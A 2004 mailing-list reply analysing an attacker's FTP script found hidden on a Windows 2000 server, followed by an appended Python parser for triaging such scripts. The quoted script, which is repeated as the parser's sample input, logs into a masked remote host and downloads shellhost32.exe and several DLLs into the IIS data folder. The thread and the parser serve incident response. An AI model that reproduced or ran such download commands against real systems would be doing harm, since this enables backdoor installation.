Re: One of my W2K servers hacked?

From: Alexander Mattausch (Alexander.Mattausch_at_physik.uni-erlangen.de)
Date: 11/12/04


Date: Fri, 12 Nov 2004 15:25:52 +0100

serge wrote:

> I inherited servers: W2K, W2003, no, no SBS in this network.
> Can I still ask the question here?
>
> I was browsing one W2K server and I found a hidden folder in C: drive
> called "x", with a file in it called "x.txt"
>
> Opening this file shows:
>
> open x.x.x.x 33333
> USER hack
> hack
> GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
> GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
> GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
> GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
> GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
> GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
> bye
>
> Can someone please explain what the above does and how I can verify
> whether this hacker has left backdoors, trojan horses, etc.?

These appear to me to be FTP commands. Did you replace the IP address in the
file with x.x.x.x? In principle, these are the commands that you need to
copy the listed files from the server x.x.x.x:33333, logging in as user
hack with password hack, to the directory c:\winnt\system32\inetsrv\data.
If there is a webserver running, it is possible that these files are
accessible from the internet.

As a first step you should remove these files, if they exist, from this
directory. Do not delete them, you might want to analyze them (e.g. a virus
scanner could be able to tell you which virus/trojan/backdoor it is).

It definitely is an idea to scan the full hard disk with a virus scanner.
This should be done by booting from a clean disk, e.g. a bootable CD with a
virus scanner (don't forget to update the signatures). But if this scanner
does not find anything, you are not necessarily free of any backdoors.

And, as Marina and Kevin suggested, run netstat to look for any open ports.

But if there is only the slightest hint that the system was compromised, you
have to remove the server from the internet immediately and reinstall as
soon as possible.

Regards, Alex
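As an added illustration of the triage Alex describes (this is not code from the thread), the following script parses an FTP command file of the kind quoted above, the format that the Windows command-line ftp client reads as a scripted session, and turns it into a summary an incident responder can act on: the remote host and port, the credentials, and the local paths the script writes to. The sample input is constructed to mirror the structure of the posted file; the x.x.x.x address is a placeholder, as in the post, and the helper names are this example's own.

```python
import ntpath
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample in the shape of the posted x.txt (placeholder address kept as x.x.x.x).
SAMPLE_SCRIPT = r"""open x.x.x.x 33333
USER hack
hack
GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
bye
"""


@dataclass
class FtpScriptSummary:
    """What a scripted FTP session would contact, log in as, and write to disk."""
    host: Optional[str] = None
    port: int = 21                      # default FTP control port unless "open host port" says otherwise
    user: Optional[str] = None
    password: Optional[str] = None
    transfers: List[Tuple[str, str]] = field(default_factory=list)  # (remote name, local destination)


def parse_ftp_script(text: str) -> FtpScriptSummary:
    """Parse an ftp.exe-style command file. Only the commands relevant to triage are interpreted."""
    summary = FtpScriptSummary()
    expect_password = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if expect_password:
            # A bare line right after "USER name" is the password the client would send.
            summary.password = line
            expect_password = False
            continue
        parts = line.split(maxsplit=1)
        cmd = parts[0].lower()
        arg = parts[1] if len(parts) > 1 else ""
        if cmd == "open":
            host_port = arg.split()
            summary.host = host_port[0] if host_port else None
            if len(host_port) > 1 and host_port[1].isdigit():
                summary.port = int(host_port[1])
        elif cmd == "user":
            user_pw = arg.split()
            summary.user = user_pw[0] if user_pw else None
            if len(user_pw) > 1:
                summary.password = user_pw[1]      # "USER name password" on one line
            else:
                expect_password = True             # password follows on the next line
        elif cmd in ("get", "recv"):
            names = arg.split()
            if names:
                remote = names[0]
                local = names[1] if len(names) > 1 else names[0]  # no local name: saved under remote name
                summary.transfers.append((remote, local))
        elif cmd in ("bye", "quit"):
            break
    return summary


def local_destinations(summary: FtpScriptSummary) -> List[str]:
    """Files the script would have created on this host: the first things to look for."""
    return [local for _, local in summary.transfers]


def directories_to_inspect(summary: FtpScriptSummary) -> List[str]:
    """Distinct directories written to, using Windows path rules regardless of the analysis host."""
    return sorted({ntpath.dirname(local).lower() for local in local_destinations(summary)})


def triage_report(text: str) -> str:
    s = parse_ftp_script(text)
    lines = [f"remote endpoint: {s.host}:{s.port}", f"credentials:     {s.user} / {s.password}"]
    lines += [f"written to:      {path}" for path in local_destinations(s)]
    lines += [f"inspect dir:     {d}" for d in directories_to_inspect(s)]
    return "\n".join(lines)


if __name__ == "__main__":
    print(triage_report(SAMPLE_SCRIPT))
```

The destination list is the useful output: each path is a file to preserve for analysis rather than delete, as Alex advises, and each directory is a place to compare against a known-good install. A `GET` without a second argument is handled too, since the file then lands in the client's current directory under the remote name.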


